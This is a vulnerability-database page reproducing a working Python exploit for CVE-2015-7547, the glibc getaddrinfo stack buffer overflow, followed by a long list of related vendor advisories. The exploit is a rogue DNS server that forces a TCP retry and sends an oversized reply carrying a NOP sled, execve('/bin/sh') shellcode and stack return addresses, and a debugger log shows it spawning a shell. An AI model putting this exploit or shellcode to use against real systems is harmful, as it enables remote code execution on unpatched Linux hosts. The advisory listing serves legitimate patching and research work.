Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSpeeDr00t1337DAY-ID-24769
HistorySep 06, 2016 - 12:00 a.m.

glibc - getaddrinfo Stack Based Buffer Overflow (2)

2016-09-0600:00:00
SpeeDr00t
0day.today
36

0.975 High

EPSS

Percentile

100.0%

JSON

Exploit for linux platform in category remote exploits

/*
 
add by [email protected] (jang kyoung chip)
 
This is a published vulnerability by google in the past.
Please refer to the link below.
   
Reference: 
- https://googleonlinesecurity.blogspot.kr/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
- https://github.com/fjserna/CVE-2015-7547
- CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow 
 
When Google announced about this code(vulnerability), 
it was missing information on shellcode.
So, I tried to completed the shellcode.
In the future, I hope to help your study.
   
 
(gdb) r
Starting program: /home/haker/client1 
Got object file from memory but can't read symbols: File truncated.
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send 
sendto 1
TCP Connected with 127.0.0.1:60259
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$(�foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
[UDP] Total Data len recv 36
[UDP] Total Data len recv 36
udp send 
sendto 1
TCP Connected with 127.0.0.1:60260
[TCP] Total Data len recv 76
[TCP] Request1 len recv 36
data1 = ��foobargooglecom
query = foobargooglecom$�7foobargooglecom
[TCP] Request2 len recv 36
sendto 2
data1_reply
data2_reply
process 6415 is executing new program: /bin/dash
$ id
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
$ 
 
*/
 
 
 
 
import socket
import time
import struct
import threading
 
IP = '192.168.111.5' # Insert your ip for bind() here...
ANSWERS1 = 184
 
terminate = False
last_reply = None
reply_now = threading.Event()
 
 
def dw(x):
    return struct.pack('>H', x)
 
def dd(x):
    return struct.pack('>I', x)
 
def dl(x):
    return struct.pack('<Q', x)
 
def db(x):
    return chr(x)
 
def udp_thread():
    global terminate
 
    # Handle UDP requests
    sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock_udp.bind((IP, 53))
 
    reply_counter = 0
    counter = -1
 
    answers = []
 
    while not terminate:
        data, addr = sock_udp.recvfrom(1024)
        print '[UDP] Total Data len recv ' + str(len(data))
        id_udp = struct.unpack('>H', data[0:2])[0]
        query_udp = data[12:]
 
        # Send truncated flag... so it retries over TCP
        data = dw(id_udp)                          # id
        data += dw(0x8380)                     # flags with truncated set
        data += dw(1)                        # questions
        data += dw(0)                        # answers
        data += dw(0)                        # authoritative
        data += dw(0)                        # additional
        data += query_udp                    # question
        data += '\x00' * 2500                # Need a long DNS response to force malloc 
 
        answers.append((data, addr))
 
        if len(answers) != 2:
            continue
 
        counter += 1
 
        if counter % 4 == 2:
            answers = answers[::-1]
 
 
        print 'udp send '
        time.sleep(0.01)
        sock_udp.sendto(*answers.pop(0))
 
        print 'sendto 1 '
        reply_now.wait()
        sock_udp.sendto(*answers.pop(0))
        print 'sendto 2 '
 
    sock_udp.close()
 
 
def tcp_thread():
    global terminate
    counter = -1
 
    #Open TCP socket
    sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock_tcp.bind((IP, 53))
    sock_tcp.listen(10)
 
    print 'a'
     
    while not terminate:
        conn, addr = sock_tcp.accept()
        counter += 1
        print 'TCP Connected with ' + addr[0] + ':' + str(addr[1])
 
        # Read entire packet
        data = conn.recv(1024)
        print '[TCP] Total Data len recv ' + str(len(data))
 
        reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0])
        print '[TCP] Request1 len recv ' + str(reqlen1)
        data1 = data[2:2+reqlen1]
 
        print 'data1 = ' +data1
 
        id1 = struct.unpack('>H', data1[0:2])[0]
        query1 = data[12:]
 
        print 'query = ' + query1
 
        # Do we have an extra request?
        data2 = None
        if len(data) > 2+reqlen1:
            reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0])
            print '[TCP] Request2 len recv ' + str(reqlen2)
            data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2]
            id2 = struct.unpack('>H', data2[0:2])[0]
            query2 = data2[12:]
 
 
 
    # Reply them on different packets
    data = ''
    data += dw(id1)                      # id
    data += dw(0x8180)                   # flags
    data += dw(1)                        # questions
    data += dw(ANSWERS1)                 # answers
    data += dw(0)                        # authoritative
    data += dw(0)                        # additional
    data += query1                       # question
 
 
 
    for i in range(ANSWERS1):
        answer = dw(0xc00c)  # name compressed
        answer += dw(1)      # type A
        answer += dw(1)      # class
        answer += dd(13)     # ttl
        answer += dw(4)      # data length
        answer += 'D' * 4    # data
 
        data += answer
 
    data1_reply = dw(len(data)) + data
 
    if data2:
        data = ''
        data += dw(id2)
        data += 'A' * (6)
        data += '\x08\xc5\xff\xff\xff\x7f\x00\x00'
        data += '\x90' * (44)
        data += '\x90' * (1955)
        data += '\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'
        data += '\x90' * (100)
        data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
        data += 'F' * (8)
        data += '\xc0\xc4\xff\xff\xff\x7f\x00\x00'
        data += 'G' * (134)
        data2_reply = dw(len(data)) + data
    else:
        data2_reply = None
 
    reply_now.set()
    time.sleep(0.01)
    conn.sendall(data1_reply)
    print 'data1_reply'
    time.sleep(0.01)
    if data2:
        conn.sendall(data2_reply)
        print 'data2_reply'
 
    reply_now.clear()
 
    sock_tcp.shutdown(socket.SHUT_RDWR)
    sock_tcp.close()
 
 
if __name__ == "__main__":
 
    t = threading.Thread(target=udp_thread)
    t.daemon = True
    t.start()
    tcp_thread()
    terminate = True

#  0day.today [2018-02-05]  #

Related

checkpoint_advisories 1
fortinet 1
oraclelinux 6
huawei 2
altlinux 2
redhat 4
exploitpack 2
nessus 35
openvas 36
symantec 1
threatpost 2
fedora 2
ibm 32
chrome 1
slackware 1
citrix 1
cert 1
cisco 1
suse 11
zdt 3
myhack58 3
arista 1
freebsd 1
vmware 2
seebug 1
f5 2
cve 1
paloalto 1
centos 2
ubuntu 1
ubuntucve 1
prion 1
packetstorm 4
intel 1
veracode 1
ics 2
debiancve 1
amazon 1
exploitdb 1
osv 3
debian 5
thn 1
archlinux 2
mageia 1
gentoo 1
kitploit 1
oracle 2
checkpoint_advisories
checkpoint_advisories
DNS Client Resolver glibc Buffer Overflow (CVE-2015-7547)
2016-02-18 00:00:00
fortinet
fortinet
Glibc getaddrinfo() stack-overflow
2016-02-25 00:00:00
oraclelinux
oraclelinux
glibc security update
2016-02-16 00:00:00
glibc security and bug fix update
2016-02-16 00:00:00
glibc security and bug fix update
2016-02-16 00:00:00
huawei
huawei
Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability
2016-03-04 00:00:00
Security Advisory - GNU Glibc Buffer Overflow Security Vulnerability
2016-03-04 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 6 package glibc version 6:2.11.3-alt8.M60P.5
2016-02-16 00:00:00
Security fix for the ALT Linux 7 package glibc version 6:2.17-alt8.M70P.1
2016-02-16 00:00:00
redhat
redhat
(RHSA-2016:0225) Critical: glibc security update
2016-02-16 00:00:00
(RHSA-2016:0175) Critical: glibc security and bug fix update
2016-02-16 00:00:00
(RHSA-2016:0277) Critical: rhev-hypervisor security update
2016-02-19 00:00:00
exploitpack
exploitpack
glibc - getaddrinfo Remote Stack Buffer Overflow
2016-09-06 00:00:00
glibc - getaddrinfo Stack Buffer Overflow (PoC)
2016-02-16 00:00:00
nessus
nessus
F5 Networks BIG-IP : glibc vulnerability (K47098834)
2016-02-17 00:00:00
CentOS 6 : glibc (CESA-2016:0175)
2016-02-17 00:00:00
Arista Networks EOS libresolv Overflow RCE (SA0017)
2018-02-28 00:00:00
openvas
openvas
Slackware: Security Advisory (SSA:2016-054-02)
2022-04-21 00:00:00
RedHat Update for glibc RHSA-2016:0175-01
2016-02-17 00:00:00
Extreme ExtremeXOS glibc Vulnerability (VN-2016-003)
2016-11-29 00:00:00
symantec
symantec
SA114 : GNU C Library (glibc) Remote Code Execution February 2016
2016-02-19 08:00:00
threatpost
threatpost
Magnitude of glibc Vulnerability Coming to Light
2016-02-17 16:01:47
glibc Linux remote code execution vulnerability
2016-02-16 12:00:37
fedora
fedora
[SECURITY] Fedora 23 Update: glibc-2.22-9.fc23
2016-02-17 14:21:52
[SECURITY] Fedora 22 Update: glibc-2.21-11.fc22
2016-02-17 12:51:37
ibm
ibm
Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Access Manager for Web (CVE-2015-7547)
2018-06-16 21:39:55
Security Bulletin: GNU C library (glibc) vulnerability affects IBM Security Network Active Bypass (CVE-2015-7547)
2018-06-16 21:41:40
Security Bulletin: GNU C library (glibc) vulnerability affects IBM MobileFirst Quality Assurance (CVE-2015-7547)
2018-06-17 22:32:59
chrome
chrome
Stable Channel Update for Chrome OS
2016-02-18 00:00:00
slackware
slackware
[slackware-security] glibc
2016-02-23 19:50:50
citrix
citrix
CVE-2015-7547 - Citrix Security Advisory for glibc Vulnerability
2016-02-19 04:00:00
cert
cert
glibc vulnerable to stack buffer overflow in DNS resolver
2016-02-17 00:00:00
cisco
cisco
Vulnerability in GNU glibc Affecting Cisco Products: February 2016
2016-02-18 20:22:00
suse
suse
Security update for glibc (critical)
2016-02-19 12:11:39
Security update for glibc (critical)
2016-02-19 12:11:34
Security update for glibc (important)
2016-02-19 00:11:49
zdt
zdt
glibc - getaddrinfo Stack Based Buffer Overflow (1)
2016-02-16 00:00:00
Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor Vulnerability
2022-06-21 00:00:00
Moxa Command Injection / Cross Site Scripting Vulnerabilities
2021-09-01 00:00:00
myhack58
myhack58
How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net
2017-03-05 00:00:00
Linux, the underlying function library“glibc”reproduction is a major security vulnerability, a plurality of releases affected-vulnerability warning-the black bar safety net
2016-02-18 00:00:00
How to by CVE-2015-7547(GLIBC getaddrinfo)vulnerability to bypass ASLR-exploits warning-the black bar safety net
2017-02-20 00:00:00
arista
arista
Security Advisory 0017
2017-10-31 00:00:00
freebsd
freebsd
glibc -- getaddrinfo stack-based buffer overflow
2016-02-16 00:00:00
vmware
vmware
VMware product updates address a critical glibc security vulnerability
2016-02-22 00:00:00
VMware product updates address a critical glibc security vulnerability.
2016-02-22 00:00:00
seebug
seebug
glibc getaddrinfo 栈缓冲区溢出漏洞(CVE-2015-7547)
2016-02-17 00:00:00
f5
f5
SOL47098834 - glibc vulnerability CVE-2015-7547
2016-02-16 00:00:00
K47098834 : glibc vulnerability CVE-2015-7547
2016-02-17 00:00:00
cve
cve
CVE-2015-7547
2016-02-18 21:59:00
paloalto
paloalto
Glibc DNS Resolver Vulnerability
2016-08-15 19:00:00
centos
centos
glibc, nscd security update
2016-02-17 00:39:19
glibc, nscd security update
2016-02-17 01:37:20
ubuntu
ubuntu
GNU C Library vulnerability
2016-02-16 00:00:00
ubuntucve
ubuntucve
CVE-2015-7547
2016-02-16 00:00:00
prion
prion
Stack overflow
2016-02-18 21:59:00
packetstorm
packetstorm
glibc getaddrinfo Stack Buffer Overflow
2016-09-06 00:00:00
Nexans FTTO GigaSwitch Outdated Components / Hardcoded Backdoor
2022-06-20 00:00:00
Moxa Command Injection / Cross Site Scripting / Vulnerable Software
2021-09-01 00:00:00
intel
intel
Multiple Intel Software Products and Services impacted by CVE-2015-7547
2016-05-26 00:00:00
veracode
veracode
Denial Of Service (DoS) Through C Dependency
2017-06-21 05:34:25
ics
ics
Siemens Industrial Products glibc Library Vulnerability (Update C)
2016-04-12 00:00:00
Siemens Industrial Products glibc Library Vulnerability (Update C)
2018-08-23 12:00:00
debiancve
debiancve
CVE-2015-7547
2016-02-18 21:59:00
amazon
amazon
Critical: glibc
2016-02-16 06:00:00
exploitdb
exploitdb
glibc - &#039;getaddrinfo&#039; Stack Buffer Overflow (PoC)
2016-02-16 00:00:00
osv
osv
eglibc - security update
2016-02-16 00:00:00
glibc - security update
2016-02-16 00:00:00
eglibc - security update
2016-02-16 00:00:00
debian
debian
[SECURITY] [DLA 416-1] eglibc security update
2016-02-16 16:49:24
[SECURITY] [DSA 3481-1] glibc security update
2016-02-16 14:18:27
[SECURITY] [DSA 3481-1] glibc security update
2016-02-16 14:18:27
thn
thn
Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)
2016-02-16 21:27:00
archlinux
archlinux
lib32-glibc: multiple issues
2016-02-17 00:00:00
glibc: multiple issues
2016-02-17 00:00:00
mageia
mageia
Updated glibc packages fix security vulnerabilities
2016-02-19 11:40:43
gentoo
gentoo
GNU C Library: Multiple vulnerabilities
2016-02-17 00:00:00
kitploit
kitploit
Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework
2017-11-04 13:30:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2016
2016-04-19 00:00:00
Oracle Critical Patch Update - January 2018
2018-01-16 00:00:00

0.975 High

EPSS

Percentile

100.0%

JSON
Related for 1337DAY-ID-24769
checkpoint_advisories1fortinet1oraclelinux6huawei2altlinux2redhat4exploitpack2nessus35openvas36symantec1threatpost2fedora2ibm32chrome1slackware1citrix1cert1cisco1suse11zdt3myhack583arista1freebsd1vmware2seebug1f52cve1paloalto1centos2ubuntu1ubuntucve1prion1packetstorm4intel1veracode1ics2debiancve1amazon1exploitdb1osv3debian5thn1archlinux2mageia1gentoo1kitploit1oracle2